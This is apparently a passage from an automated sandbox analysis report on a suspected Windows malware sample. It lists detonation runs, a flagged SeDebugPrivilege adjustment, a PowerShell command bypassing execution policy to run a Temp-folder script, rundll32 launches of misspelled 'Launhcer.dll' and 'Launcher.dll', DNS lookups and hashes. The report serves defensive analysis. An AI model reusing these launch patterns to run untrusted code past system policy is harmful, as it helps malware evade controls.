Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\kGCFZO6TPVYy.ps1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.72.42.20.in-addr.arpa | udp |
Files
memory/1080-4-0x00000198FE510000-0x00000198FE532000-memory.dmp
memory/1080-5-0x00007FF881A50000-0x00007FF88243C000-memory.dmp
memory/1080-6-0x00000198FE490000-0x00000198FE4A0000-memory.dmp
memory/1080-7-0x00000198FE490000-0x00000198FE4A0000-memory.dmp
memory/1080-10-0x00000198FE6C0000-0x00000198FE736000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p1jkdy1s.3q4.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1080-31-0x00000198FE490000-0x00000198FE4A0000-memory.dmp
memory/1080-35-0x00007FF881A50000-0x00007FF88243C000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
128s
Max time network
137s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.79.70.13.in-addr.arpa | udp |
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:23
Platform
win10-20240221-en
Max time kernel
119s
Max time network
137s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 28.73.42.20.in-addr.arpa | udp |